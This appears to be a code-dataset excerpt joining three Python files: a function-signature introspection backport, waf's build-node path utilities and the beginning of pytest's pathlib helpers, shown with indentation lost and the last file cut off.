__version__ = "0.4"
__all__ = ['BoundArguments', 'Parameter', 'Signature', 'signature']
_WrapperDescriptor = type(type.__call__)
_MethodWrapper = type(all.__call__)
_NonUserDefinedCallables = (_WrapperDescriptor,
_MethodWrapper,
types.BuiltinFunctionType)
def formatannotation(annotation, base_module=None):
if isinstance(annotation, type):
if annotation.__module__ in ('builtins', '__builtin__', base_module):
return annotation.__name__
return annotation.__module__+'.'+annotation.__name__
return repr(annotation)
def _get_user_defined_method(cls, method_name, *nested):
try:
if cls is type:
return
meth = getattr(cls, method_name)
for name in nested:
meth = getattr(meth, name, meth)
except AttributeError:
return
else:
if not isinstance(meth, _NonUserDefinedCallables):
# Once '__signature__' will be added to 'C'-level
# callables, this check won't be necessary
return meth
def signature(obj):
'''Get a signature object for the passed callable.'''
if not callable(obj):
raise TypeError('{0!r} is not a callable object'.format(obj))
if isinstance(obj, types.MethodType):
sig = signature(obj.__func__)
if obj.__self__ is None:
# Unbound method: the first parameter becomes positional-only
if sig.parameters:
first = sig.parameters.values()[0].replace(
kind=_POSITIONAL_ONLY)
return sig.replace(
parameters=(first,) + tuple(sig.parameters.values())[1:])
else:
return sig
else:
# In this case we skip the first parameter of the underlying
# function (usually `self` or `cls`).
return sig.replace(parameters=tuple(sig.parameters.values())[1:])
try:
sig = obj.__signature__
except AttributeError:
pass
else:
if sig is not None:
return sig
try:
# Was this function wrapped by a decorator?
wrapped = obj.__wrapped__
except AttributeError:
pass
else:
return signature(wrapped)
if isinstance(obj, types.FunctionType):
return Signature.from_function(obj)
if isinstance(obj, functools.partial):
sig = signature(obj.func)
new_params = OrderedDict(sig.parameters.items())
partial_args = obj.args or ()
partial_keywords = obj.keywords or {}
try:
ba = sig.bind_partial(*partial_args, **partial_keywords)
except TypeError as ex:
msg = 'partial object {0!r} has incorrect arguments'.format(obj)
raise ValueError(msg)
for arg_name, arg_value in ba.arguments.items():
param = new_params[arg_name]
if arg_name in partial_keywords:
# We set a new default value, because the following code
# is correct:
#
# >>> def foo(a): print(a)
# >>> print(partial(partial(foo, a=10), a=20)())
# 20
# >>> print(partial(partial(foo, a=10), a=20)(a=30))
# 30
#
# So, with 'partial' objects, passing a keyword argument is
# like setting a new default value for the corresponding
# parameter
#
# We also mark this parameter with '_partial_kwarg'
# flag. Later, in '_bind', the 'default' value of this
# parameter will be added to 'kwargs', to simulate
# the 'functools.partial' real call.
new_params[arg_name] = param.replace(default=arg_value,
_partial_kwarg=True)
elif (param.kind not in (_VAR_KEYWORD, _VAR_POSITIONAL) and
not param._partial_kwarg):
new_params.pop(arg_name)
return sig.replace(parameters=new_params.values())
sig = None
if isinstance(obj, type):
# obj is a class or a metaclass
# First, let's see if it has an overloaded __call__ defined
# in its metaclass
call = _get_user_defined_method(type(obj), '__call__')
if call is not None:
sig = signature(call)
else:
# Now we check if the 'obj' class has a '__new__' method
new = _get_user_defined_method(obj, '__new__')
if new is not None:
sig = signature(new)
else:
# Finally, we should have at least __init__ implemented
init = _get_user_defined_method(obj, '__init__')
if init is not None:
sig = signature(init)
elif not isinstance(obj, _NonUserDefinedCallables):
# An object with __call__
# We also check that the 'obj' is not an instance of
# _WrapperDescriptor or _MethodWrapper to avoid
# infinite recursion (and even potential segfault)
call = _get_user_defined_method(type(obj), '__call__', 'im_func')
if call is not None:
sig = signature(call)
if sig is not None:
# For classes and objects we skip the first parameter of their
# __call__, __new__, or __init__ methods
return sig.replace(parameters=tuple(sig.parameters.values())[1:])
if isinstance(obj, types.BuiltinFunctionType):
# Raise a nicer error message for builtins
msg = 'no signature found for builtin function {0!r}'.format(obj)
raise ValueError(msg)
raise ValueError('callable {0!r} is not supported by signature'.format(obj))
class _void(object):
'''A private marker - used in Parameter & Signature'''
class _empty(object):
pass
class _ParameterKind(int):
def __new__(self, *args, **kwargs):
obj = int.__new__(self, *args)
obj._name = kwargs['name']
return obj
def __str__(self):
return self._name
def __repr__(self):
return '<_ParameterKind: {0!r}>'.format(self._name)
_POSITIONAL_ONLY = _ParameterKind(0, name='POSITIONAL_ONLY')
_POSITIONAL_OR_KEYWORD = _ParameterKind(1, name='POSITIONAL_OR_KEYWORD')
_VAR_POSITIONAL = _ParameterKind(2, name='VAR_POSITIONAL')
_KEYWORD_ONLY = _ParameterKind(3, name='KEYWORD_ONLY')
_VAR_KEYWORD = _ParameterKind(4, name='VAR_KEYWORD')
class Parameter(object):
'''Represents a parameter in a function signature.
Has the following public attributes:
* name : str
The name of the parameter as a string.
* default : object
The default value for the parameter if specified. If the
parameter has no default value, this attribute is not set.
* annotation
The annotation for the parameter if specified. If the
parameter has no annotation, this attribute is not set.
* kind : str
Describes how argument values are bound to the parameter.
Possible values: `Parameter.POSITIONAL_ONLY`,
`Parameter.POSITIONAL_OR_KEYWORD`, `Parameter.VAR_POSITIONAL`,
`Parameter.KEYWORD_ONLY`, `Parameter.VAR_KEYWORD`.
'''
__slots__ = ('_name', '_kind', '_default', '_annotation', '_partial_kwarg')
POSITIONAL_ONLY = _POSITIONAL_ONLY
POSITIONAL_OR_KEYWORD = _POSITIONAL_OR_KEYWORD
VAR_POSITIONAL = _VAR_POSITIONAL
KEYWORD_ONLY = _KEYWORD_ONLY
VAR_KEYWORD = _VAR_KEYWORD
empty = _empty
def __init__(self, name, kind, default=_empty, annotation=_empty,
_partial_kwarg=False):
if kind not in (_POSITIONAL_ONLY, _POSITIONAL_OR_KEYWORD,
_VAR_POSITIONAL, _KEYWORD_ONLY, _VAR_KEYWORD):
raise ValueError("invalid value for 'Parameter.kind' attribute")
self._kind = kind
if default is not _empty:
if kind in (_VAR_POSITIONAL, _VAR_KEYWORD):
msg = '{0} parameters cannot have default values'.format(kind)
raise ValueError(msg)
self._default = default
self._annotation = annotation
if name is None:
if kind != _POSITIONAL_ONLY:
raise ValueError("None is not a valid name for a "
"non-positional-only parameter")
self._name = name
else:
name = str(name)
if kind != _POSITIONAL_ONLY and not re.match(r'[a-z_]\w*$', name, re.I):
msg = '{0!r} is not a valid parameter name'.format(name)
raise ValueError(msg)
self._name = name
self._partial_kwarg = _partial_kwarg
@property
def name(self):
return self._name
@property
def default(self):
return self._default
@property
def annotation(self):
return self._annotation
@property
def kind(self):
return self._kind
def replace(self, name=_void, kind=_void, annotation=_void,
default=_void, _partial_kwarg=_void):
'''Creates a customized copy of the Parameter.'''
if name is _void:
name = self._name
if kind is _void:
kind = self._kind
if annotation is _void:
annotation = self._annotation
if default is _void:
default = self._default
if _partial_kwarg is _void:
_partial_kwarg = self._partial_kwarg
return type(self)(name, kind, default=default, annotation=annotation,
_partial_kwarg=_partial_kwarg)
def __str__(self):
kind = self.kind
formatted = self._name
if kind == _POSITIONAL_ONLY:
if formatted is None:
formatted = ''
formatted = '<{0}>'.format(formatted)
# Add annotation and default value
if self._annotation is not _empty:
formatted = '{0}:{1}'.format(formatted,
formatannotation(self._annotation))
if self._default is not _empty:
formatted = '{0}={1}'.format(formatted, repr(self._default))
if kind == _VAR_POSITIONAL:
formatted = '*' + formatted
elif kind == _VAR_KEYWORD:
formatted = '**' + formatted
return formatted
def __repr__(self):
return '<{0} at {1:#x} {2!r}>'.format(self.__class__.__name__,
id(self), self.name)
def __hash__(self):
msg = "unhashable type: '{0}'".format(self.__class__.__name__)
raise TypeError(msg)
def __eq__(self, other):
return (issubclass(other.__class__, Parameter) and
self._name == other._name and
self._kind == other._kind and
self._default == other._default and
self._annotation == other._annotation)
def __ne__(self, other):
return not self.__eq__(other)
class BoundArguments(object):
'''Result of `Signature.bind` call. Holds the mapping of arguments
to the function's parameters.
Has the following public attributes:
* arguments : OrderedDict
An ordered mutable mapping of parameters' names to arguments' values.
Does not contain arguments' default values.
* signature : Signature
The Signature object that created this instance.
* args : tuple
Tuple of positional arguments values.
* kwargs : dict
Dict of keyword arguments values.
'''
def __init__(self, signature, arguments):
self.arguments = arguments
self._signature = signature
@property
def signature(self):
return self._signature
@property
def args(self):
args = []
for param_name, param in self._signature.parameters.items():
if (param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY) or
param._partial_kwarg):
# Keyword arguments mapped by 'functools.partial'
# (Parameter._partial_kwarg is True) are mapped
# in 'BoundArguments.kwargs', along with VAR_KEYWORD &
# KEYWORD_ONLY
break
try:
arg = self.arguments[param_name]
except KeyError:
# We're done here. Other arguments
# will be mapped in 'BoundArguments.kwargs'
break
else:
if param.kind == _VAR_POSITIONAL:
# *args
args.extend(arg)
else:
# plain argument
args.append(arg)
return tuple(args)
@property
def kwargs(self):
kwargs = {}
kwargs_started = False
for param_name, param in self._signature.parameters.items():
if not kwargs_started:
if (param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY) or
param._partial_kwarg):
kwargs_started = True
else:
if param_name not in self.arguments:
kwargs_started = True
continue
if not kwargs_started:
continue
try:
arg = self.arguments[param_name]
except KeyError:
pass
else:
if param.kind == _VAR_KEYWORD:
# **kwargs
kwargs.update(arg)
else:
# plain keyword argument
kwargs[param_name] = arg
return kwargs
def __hash__(self):
msg = "unhashable type: '{0}'".format(self.__class__.__name__)
raise TypeError(msg)
def __eq__(self, other):
return (issubclass(other.__class__, BoundArguments) and
self.signature == other.signature and
self.arguments == other.arguments)
def __ne__(self, other):
return not self.__eq__(other)
class Signature(object):
'''A Signature object represents the overall signature of a function.
It stores a Parameter object for each parameter accepted by the
function, as well as information specific to the function itself.
A Signature object has the following public attributes and methods:
* parameters : OrderedDict
An ordered mapping of parameters' names to the corresponding
Parameter objects (keyword-only arguments are in the same order
as listed in `code.co_varnames`).
* return_annotation : object
The annotation for the return type of the function if specified.
If the function has no annotation for its return type, this
attribute is not set.
* bind(*args, **kwargs) -> BoundArguments
Creates a mapping from positional and keyword arguments to
parameters.
* bind_partial(*args, **kwargs) -> BoundArguments
Creates a partial mapping from positional and keyword arguments
to parameters (simulating 'functools.partial' behavior.)
'''
__slots__ = ('_return_annotation', '_parameters')
_parameter_cls = Parameter
_bound_arguments_cls = BoundArguments
empty = _empty
def __init__(self, parameters=None, return_annotation=_empty,
__validate_parameters__=True):
'''Constructs Signature from the given list of Parameter
objects and 'return_annotation'. All arguments are optional.
'''
if parameters is None:
params = OrderedDict()
else:
if __validate_parameters__:
params = OrderedDict()
top_kind = _POSITIONAL_ONLY
for idx, param in enumerate(parameters):
kind = param.kind
if kind < top_kind:
msg = 'wrong parameter order: {0} before {1}'
msg = msg.format(top_kind, param.kind)
raise ValueError(msg)
else:
top_kind = kind
name = param.name
if name is None:
name = str(idx)
param = param.replace(name=name)
if name in params:
msg = 'duplicate parameter name: {0!r}'.format(name)
raise ValueError(msg)
params[name] = param
else:
params = OrderedDict(((param.name, param)
for param in parameters))
self._parameters = params
self._return_annotation = return_annotation
@classmethod
def from_function(cls, func):
'''Constructs Signature for the given python function'''
if not isinstance(func, types.FunctionType):
raise TypeError('{0!r} is not a Python function'.format(func))
Parameter = cls._parameter_cls
# Parameter information.
func_code = func.__code__
pos_count = func_code.co_argcount
arg_names = func_code.co_varnames
positional = tuple(arg_names[:pos_count])
keyword_only_count = getattr(func_code, 'co_kwonlyargcount', 0)
keyword_only = arg_names[pos_count:(pos_count + keyword_only_count)]
annotations = getattr(func, '__annotations__', {})
defaults = func.__defaults__
kwdefaults = getattr(func, '__kwdefaults__', None)
if defaults:
pos_default_count = len(defaults)
else:
pos_default_count = 0
parameters = []
# Non-keyword-only parameters w/o defaults.
non_default_count = pos_count - pos_default_count
for name in positional[:non_default_count]:
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD))
# ... w/ defaults.
for offset, name in enumerate(positional[non_default_count:]):
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD,
default=defaults[offset]))
# *args
if func_code.co_flags & 0x04:
name = arg_names[pos_count + keyword_only_count]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_POSITIONAL))
# Keyword-only parameters.
for name in keyword_only:
default = _empty
if kwdefaults is not None:
default = kwdefaults.get(name, _empty)
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_KEYWORD_ONLY,
default=default))
# **kwargs
if func_code.co_flags & 0x08:
index = pos_count + keyword_only_count
if func_code.co_flags & 0x04:
index += 1
name = arg_names[index]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_KEYWORD))
return cls(parameters,
return_annotation=annotations.get('return', _empty),
__validate_parameters__=False)
@property
def parameters(self):
try:
return types.MappingProxyType(self._parameters)
except AttributeError:
return OrderedDict(self._parameters.items())
@property
def return_annotation(self):
return self._return_annotation
def replace(self, parameters=_void, return_annotation=_void):
'''Creates a customized copy of the Signature.
Pass 'parameters' and/or 'return_annotation' arguments
to override them in the new copy.
'''
if parameters is _void:
parameters = self.parameters.values()
if return_annotation is _void:
return_annotation = self._return_annotation
return type(self)(parameters,
return_annotation=return_annotation)
def __hash__(self):
msg = "unhashable type: '{0}'".format(self.__class__.__name__)
raise TypeError(msg)
def __eq__(self, other):
if (not issubclass(type(other), Signature) or
self.return_annotation != other.return_annotation or
len(self.parameters) != len(other.parameters)):
return False
other_positions = dict((param, idx)
for idx, param in enumerate(other.parameters.keys()))
for idx, (param_name, param) in enumerate(self.parameters.items()):
if param.kind == _KEYWORD_ONLY:
try:
other_param = other.parameters[param_name]
except KeyError:
return False
else:
if param != other_param:
return False
else:
try:
other_idx = other_positions[param_name]
except KeyError:
return False
else:
if (idx != other_idx or
param != other.parameters[param_name]):
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def _bind(self, args, kwargs, partial=False):
'''Private method. Don't use directly.'''
arguments = OrderedDict()
parameters = iter(self.parameters.values())
parameters_ex = ()
arg_vals = iter(args)
if partial:
# Support for binding arguments to 'functools.partial' objects.
# See 'functools.partial' case in 'signature()' implementation
# for details.
for param_name, param in self.parameters.items():
if (param._partial_kwarg and param_name not in kwargs):
# Simulating 'functools.partial' behavior
kwargs[param_name] = param.default
while True:
# Let's iterate through the positional arguments and corresponding
# parameters
try:
arg_val = next(arg_vals)
except StopIteration:
# No more positional arguments
try:
param = next(parameters)
except StopIteration:
# No more parameters. That's it. Just need to check that
# we have no `kwargs` after this while loop
break
else:
if param.kind == _VAR_POSITIONAL:
# That's OK, just empty *args. Let's start parsing
# kwargs
break
elif param.name in kwargs:
if param.kind == _POSITIONAL_ONLY:
msg = '{arg!r} parameter is positional only, ' \
'but was passed as a keyword'
msg = msg.format(arg=param.name)
raise TypeError(msg)
parameters_ex = (param,)
break
elif (param.kind == _VAR_KEYWORD or
param.default is not _empty):
# That's fine too - we have a default value for this
# parameter. So, lets start parsing `kwargs`, starting
# with the current parameter
parameters_ex = (param,)
break
else:
if partial:
parameters_ex = (param,)
break
else:
msg = '{arg!r} parameter lacking default value'
msg = msg.format(arg=param.name)
raise TypeError(msg)
else:
# We have a positional argument to process
try:
param = next(parameters)
except StopIteration:
raise TypeError('too many positional arguments')
else:
if param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
# Looks like we have no parameter for this positional
# argument
raise TypeError('too many positional arguments')
if param.kind == _VAR_POSITIONAL:
# We have an '*args'-like argument, let's fill it with
# all positional arguments we have left and move on to
# the next phase
values = [arg_val]
values.extend(arg_vals)
arguments[param.name] = tuple(values)
break
if param.name in kwargs:
raise TypeError('multiple values for argument '
'{arg!r}'.format(arg=param.name))
arguments[param.name] = arg_val
# Now, we iterate through the remaining parameters to process
# keyword arguments
kwargs_param = None
for param in itertools.chain(parameters_ex, parameters):
if param.kind == _POSITIONAL_ONLY:
# This should never happen in case of a properly built
# Signature object (but let's have this check here
# to ensure correct behaviour just in case)
raise TypeError('{arg!r} parameter is positional only, '
'but was passed as a keyword'. \
format(arg=param.name))
if param.kind == _VAR_KEYWORD:
# Memorize that we have a '**kwargs'-like parameter
kwargs_param = param
continue
param_name = param.name
try:
arg_val = kwargs.pop(param_name)
except KeyError:
# We have no value for this parameter. It's fine though,
# if it has a default value, or it is an '*args'-like
# parameter, left alone by the processing of positional
# arguments.
if (not partial and param.kind != _VAR_POSITIONAL and
param.default is _empty):
raise TypeError('{arg!r} parameter lacking default value'. \
format(arg=param_name))
else:
arguments[param_name] = arg_val
if kwargs:
if kwargs_param is not None:
# Process our '**kwargs'-like parameter
arguments[kwargs_param.name] = kwargs
else:
raise TypeError('too many keyword arguments')
return self._bound_arguments_cls(self, arguments)
def bind(self, *args, **kwargs):
'''Get a BoundArguments object, that maps the passed `args`
and `kwargs` to the function's signature. Raises `TypeError`
if the passed arguments can not be bound.
'''
return self._bind(args, kwargs)
def bind_partial(self, *args, **kwargs):
'''Get a BoundArguments object, that partially maps the
passed `args` and `kwargs` to the function's signature.
Raises `TypeError` if the passed arguments can not be bound.
'''
return self._bind(args, kwargs, partial=True)
def __str__(self):
result = []
render_kw_only_separator = True
for idx, param in enumerate(self.parameters.values()):
formatted = str(param)
kind = param.kind
if kind == _VAR_POSITIONAL:
# OK, we have an '*args'-like parameter, so we won't need
# a '*' to separate keyword-only arguments
render_kw_only_separator = False
elif kind == _KEYWORD_ONLY and render_kw_only_separator:
# We have a keyword-only parameter to render and we haven't
# rendered an '*args'-like parameter before, so add a '*'
# separator to the parameters list ("foo(arg1, *, arg2)" case)
result.append('*')
# This condition should be only triggered once, so
# reset the flag
render_kw_only_separator = False
result.append(formatted)
rendered = '({0})'.format(', '.join(result))
if self.return_annotation is not _empty:
anno = formatannotation(self.return_annotation)
rendered += ' -> {0}'.format(anno)
return rendered
| bsd-3-clause |
Cactuslegs/audacity-of-nope | lib-src/lv2/sord/waflib/Node.py | 62 | 10698 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import os,re,sys,shutil
from waflib import Utils,Errors
exclude_regs='''
**/*~
**/#*#
**/.#*
**/%*%
**/._*
**/CVS
**/CVS/**
**/.cvsignore
**/SCCS
**/SCCS/**
**/vssver.scc
**/.svn
**/.svn/**
**/BitKeeper
**/.git
**/.git/**
**/.gitignore
**/.bzr
**/.bzrignore
**/.bzr/**
**/.hg
**/.hg/**
**/_MTN
**/_MTN/**
**/.arch-ids
**/{arch}
**/_darcs
**/_darcs/**
**/.DS_Store'''
def split_path(path):
return path.split('/')
def split_path_cygwin(path):
if path.startswith('//'):
ret=path.split('/')[2:]
ret[0]='/'+ret[0]
return ret
return path.split('/')
re_sp=re.compile('[/\\\\]')
def split_path_win32(path):
if path.startswith('\\\\'):
ret=re.split(re_sp,path)[2:]
ret[0]='\\'+ret[0]
return ret
return re.split(re_sp,path)
if sys.platform=='cygwin':
split_path=split_path_cygwin
elif Utils.is_win32:
split_path=split_path_win32
class Node(object):
__slots__=('name','sig','children','parent','cache_abspath','cache_isdir','cache_sig')
def __init__(self,name,parent):
self.name=name
self.parent=parent
if parent:
if name in parent.children:
raise Errors.WafError('node %s exists in the parent files %r already'%(name,parent))
parent.children[name]=self
def __setstate__(self,data):
self.name=data[0]
self.parent=data[1]
if data[2]is not None:
self.children=data[2]
if data[3]is not None:
self.sig=data[3]
def __getstate__(self):
return(self.name,self.parent,getattr(self,'children',None),getattr(self,'sig',None))
def __str__(self):
return self.name
def __repr__(self):
return self.abspath()
def __hash__(self):
return id(self)
def __eq__(self,node):
return id(self)==id(node)
def __copy__(self):
raise Errors.WafError('nodes are not supposed to be copied')
def read(self,flags='r',encoding='ISO8859-1'):
return Utils.readf(self.abspath(),flags,encoding)
def write(self,data,flags='w',encoding='ISO8859-1'):
Utils.writef(self.abspath(),data,flags,encoding)
def chmod(self,val):
os.chmod(self.abspath(),val)
def delete(self):
try:
if getattr(self,'children',None):
shutil.rmtree(self.abspath())
else:
os.unlink(self.abspath())
except OSError:
pass
self.evict()
def evict(self):
del self.parent.children[self.name]
def suffix(self):
k=max(0,self.name.rfind('.'))
return self.name[k:]
def height(self):
d=self
val=-1
while d:
d=d.parent
val+=1
return val
def listdir(self):
lst=Utils.listdir(self.abspath())
lst.sort()
return lst
def mkdir(self):
if getattr(self,'cache_isdir',None):
return
try:
self.parent.mkdir()
except OSError:
pass
if self.name:
try:
os.makedirs(self.abspath())
except OSError:
pass
if not os.path.isdir(self.abspath()):
raise Errors.WafError('Could not create the directory %s'%self.abspath())
try:
self.children
except AttributeError:
self.children={}
self.cache_isdir=True
def find_node(self,lst):
if isinstance(lst,str):
lst=[x for x in split_path(lst)if x and x!='.']
cur=self
for x in lst:
if x=='..':
cur=cur.parent or cur
continue
try:
ch=cur.children
except AttributeError:
cur.children={}
else:
try:
cur=cur.children[x]
continue
except KeyError:
pass
cur=self.__class__(x,cur)
try:
os.stat(cur.abspath())
except OSError:
cur.evict()
return None
ret=cur
try:
os.stat(ret.abspath())
except OSError:
ret.evict()
return None
try:
while not getattr(cur.parent,'cache_isdir',None):
cur=cur.parent
cur.cache_isdir=True
except AttributeError:
pass
return ret
def make_node(self,lst):
if isinstance(lst,str):
lst=[x for x in split_path(lst)if x and x!='.']
cur=self
for x in lst:
if x=='..':
cur=cur.parent or cur
continue
if getattr(cur,'children',{}):
if x in cur.children:
cur=cur.children[x]
continue
else:
cur.children={}
cur=self.__class__(x,cur)
return cur
def search_node(self,lst):
if isinstance(lst,str):
lst=[x for x in split_path(lst)if x and x!='.']
cur=self
for x in lst:
if x=='..':
cur=cur.parent or cur
else:
try:
cur=cur.children[x]
except(AttributeError,KeyError):
return None
return cur
def path_from(self,node):
c1=self
c2=node
c1h=c1.height()
c2h=c2.height()
lst=[]
up=0
while c1h>c2h:
lst.append(c1.name)
c1=c1.parent
c1h-=1
while c2h>c1h:
up+=1
c2=c2.parent
c2h-=1
while id(c1)!=id(c2):
lst.append(c1.name)
up+=1
c1=c1.parent
c2=c2.parent
for i in range(up):
lst.append('..')
lst.reverse()
return os.sep.join(lst)or'.'
def abspath(self):
try:
return self.cache_abspath
except AttributeError:
pass
if os.sep=='/':
if not self.parent:
val=os.sep
elif not self.parent.name:
val=os.sep+self.name
else:
val=self.parent.abspath()+os.sep+self.name
else:
if not self.parent:
val=''
elif not self.parent.name:
val=self.name+os.sep
else:
val=self.parent.abspath().rstrip(os.sep)+os.sep+self.name
self.cache_abspath=val
return val
def is_child_of(self,node):
p=self
diff=self.height()-node.height()
while diff>0:
diff-=1
p=p.parent
return id(p)==id(node)
def ant_iter(self,accept=None,maxdepth=25,pats=[],dir=False,src=True,remove=True):
dircont=self.listdir()
dircont.sort()
try:
lst=set(self.children.keys())
except AttributeError:
self.children={}
else:
if remove:
for x in lst-set(dircont):
self.children[x].evict()
for name in dircont:
npats=accept(name,pats)
if npats and npats[0]:
accepted=[]in npats[0]
node=self.make_node([name])
isdir=os.path.isdir(node.abspath())
if accepted:
if isdir:
if dir:
yield node
else:
if src:
yield node
if getattr(node,'cache_isdir',None)or isdir:
node.cache_isdir=True
if maxdepth:
for k in node.ant_iter(accept=accept,maxdepth=maxdepth-1,pats=npats,dir=dir,src=src,remove=remove):
yield k
raise StopIteration
def ant_glob(self,*k,**kw):
src=kw.get('src',True)
dir=kw.get('dir',False)
excl=kw.get('excl',exclude_regs)
incl=k and k[0]or kw.get('incl','**')
reflags=kw.get('ignorecase',0)and re.I
def to_pat(s):
lst=Utils.to_list(s)
ret=[]
for x in lst:
x=x.replace('\\','/').replace('//','/')
if x.endswith('/'):
x+='**'
lst2=x.split('/')
accu=[]
for k in lst2:
if k=='**':
accu.append(k)
else:
k=k.replace('.','[.]').replace('*','.*').replace('?','.').replace('+','\\+')
k='^%s$'%k
try:
accu.append(re.compile(k,flags=reflags))
except Exception ,e:
raise Errors.WafError("Invalid pattern: %s"%k,e)
ret.append(accu)
return ret
def filtre(name,nn):
ret=[]
for lst in nn:
if not lst:
pass
elif lst[0]=='**':
ret.append(lst)
if len(lst)>1:
if lst[1].match(name):
ret.append(lst[2:])
else:
ret.append([])
elif lst[0].match(name):
ret.append(lst[1:])
return ret
def accept(name,pats):
nacc=filtre(name,pats[0])
nrej=filtre(name,pats[1])
if[]in nrej:
nacc=[]
return[nacc,nrej]
ret=[x for x in self.ant_iter(accept=accept,pats=[to_pat(incl),to_pat(excl)],maxdepth=25,dir=dir,src=src,remove=kw.get('remove',True))]
if kw.get('flat',False):
return' '.join([x.path_from(self)for x in ret])
return ret
def is_src(self):
cur=self
x=id(self.ctx.srcnode)
y=id(self.ctx.bldnode)
while cur.parent:
if id(cur)==y:
return False
if id(cur)==x:
return True
cur=cur.parent
return False
def is_bld(self):
cur=self
y=id(self.ctx.bldnode)
while cur.parent:
if id(cur)==y:
return True
cur=cur.parent
return False
def get_src(self):
cur=self
x=id(self.ctx.srcnode)
y=id(self.ctx.bldnode)
lst=[]
while cur.parent:
if id(cur)==y:
lst.reverse()
return self.ctx.srcnode.make_node(lst)
if id(cur)==x:
return self
lst.append(cur.name)
cur=cur.parent
return self
def get_bld(self):
cur=self
x=id(self.ctx.srcnode)
y=id(self.ctx.bldnode)
lst=[]
while cur.parent:
if id(cur)==y:
return self
if id(cur)==x:
lst.reverse()
return self.ctx.bldnode.make_node(lst)
lst.append(cur.name)
cur=cur.parent
lst.reverse()
if lst and Utils.is_win32 and len(lst[0])==2 and lst[0].endswith(':'):
lst[0]=lst[0][0]
return self.ctx.bldnode.make_node(['__root__']+lst)
def find_resource(self,lst):
if isinstance(lst,str):
lst=[x for x in split_path(lst)if x and x!='.']
node=self.get_bld().search_node(lst)
if not node:
self=self.get_src()
node=self.find_node(lst)
if node:
if os.path.isdir(node.abspath()):
return None
return node
def find_or_declare(self,lst):
if isinstance(lst,str):
lst=[x for x in split_path(lst)if x and x!='.']
node=self.get_bld().search_node(lst)
if node:
if not os.path.isfile(node.abspath()):
node.sig=None
node.parent.mkdir()
return node
self=self.get_src()
node=self.find_node(lst)
if node:
if not os.path.isfile(node.abspath()):
node.sig=None
node.parent.mkdir()
return node
node=self.get_bld().make_node(lst)
node.parent.mkdir()
return node
def find_dir(self,lst):
if isinstance(lst,str):
lst=[x for x in split_path(lst)if x and x!='.']
node=self.find_node(lst)
try:
if not os.path.isdir(node.abspath()):
return None
except(OSError,AttributeError):
return None
return node
def change_ext(self,ext,ext_in=None):
name=self.name
if ext_in is None:
k=name.rfind('.')
if k>=0:
name=name[:k]+ext
else:
name=name+ext
else:
name=name[:-len(ext_in)]+ext
return self.parent.find_or_declare([name])
def nice_path(self,env=None):
return self.path_from(self.ctx.launch_node())
def bldpath(self):
return self.path_from(self.ctx.bldnode)
def srcpath(self):
return self.path_from(self.ctx.srcnode)
def relpath(self):
cur=self
x=id(self.ctx.bldnode)
while cur.parent:
if id(cur)==x:
return self.bldpath()
cur=cur.parent
return self.srcpath()
def bld_dir(self):
return self.parent.bldpath()
def bld_base(self):
s=os.path.splitext(self.name)[0]
return self.bld_dir()+os.sep+s
def get_bld_sig(self):
try:
return self.cache_sig
except AttributeError:
pass
if not self.is_bld()or self.ctx.bldnode is self.ctx.srcnode:
self.sig=Utils.h_file(self.abspath())
self.cache_sig=ret=self.sig
return ret
search=search_node
pickle_lock=Utils.threading.Lock()
class Nod3(Node):
pass
| gpl-2.0 |
cloudera/hue | desktop/core/ext-py/pytest-4.6.11/src/_pytest/pathlib.py | 3 | 11264 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import atexit
import errno
import fnmatch
import itertools
import operator
import os
import shutil
import sys
import uuid
import warnings
from functools import partial
from functools import reduce
from os.path import expanduser
from os.path import expandvars
from os.path import isabs
from os.path import sep
from posixpath import sep as posix_sep
import six
from six.moves import map
from .compat import PY36
from _pytest.warning_types import PytestWarning
if PY36:
from pathlib import Path, PurePath
else:
from pathlib2 import Path, PurePath
__all__ = ["Path", "PurePath"]
LOCK_TIMEOUT = 60 * 60 * 3
get_lock_path = operator.methodcaller("joinpath", ".lock")
def ensure_reset_dir(path):
"""
ensures the given path is an empty directory
"""
if path.exists():
rm_rf(path)
path.mkdir()
def on_rm_rf_error(func, path, exc, **kwargs):
"""Handles known read-only errors during rmtree.
The returned value is used only by our own tests.
"""
start_path = kwargs["start_path"]
exctype, excvalue = exc[:2]
# another process removed the file in the middle of the "rm_rf" (xdist for example)
# more context: https://github.com/pytest-dev/pytest/issues/5974#issuecomment-543799018
if isinstance(excvalue, OSError) and excvalue.errno == errno.ENOENT:
return False
if not isinstance(excvalue, OSError) or excvalue.errno not in (
errno.EACCES,
errno.EPERM,
):
warnings.warn(
PytestWarning(
"(rm_rf) error removing {}\n{}: {}".format(path, exctype, excvalue)
)
)
return False
if func not in (os.rmdir, os.remove, os.unlink):
warnings.warn(
PytestWarning(
"(rm_rf) unknown function {} when removing {}:\n{}: {}".format(
path, func, exctype, excvalue
)
)
)
return False
# Chmod + retry.
import stat
def chmod_rw(p):
mode = os.stat(p).st_mode
os.chmod(p, mode | stat.S_IRUSR | stat.S_IWUSR)
# For files, we need to recursively go upwards in the directories to
# ensure they all are also writable.
p = Path(path)
if p.is_file():
for parent in p.parents:
chmod_rw(str(parent))
# stop when we reach the original path passed to rm_rf
if parent == start_path:
break
chmod_rw(str(path))
func(path)
return True
def rm_rf(path):
"""Remove the path contents recursively, even if some elements
are read-only.
"""
onerror = partial(on_rm_rf_error, start_path=path)
shutil.rmtree(str(path), onerror=onerror)
def find_prefixed(root, prefix):
"""finds all elements in root that begin with the prefix, case insensitive"""
l_prefix = prefix.lower()
for x in root.iterdir():
if x.name.lower().startswith(l_prefix):
yield x
def extract_suffixes(iter, prefix):
"""
:param iter: iterator over path names
:param prefix: expected prefix of the path names
:returns: the parts of the paths following the prefix
"""
p_len = len(prefix)
for p in iter:
yield p.name[p_len:]
def find_suffixes(root, prefix):
"""combines find_prefixes and extract_suffixes
"""
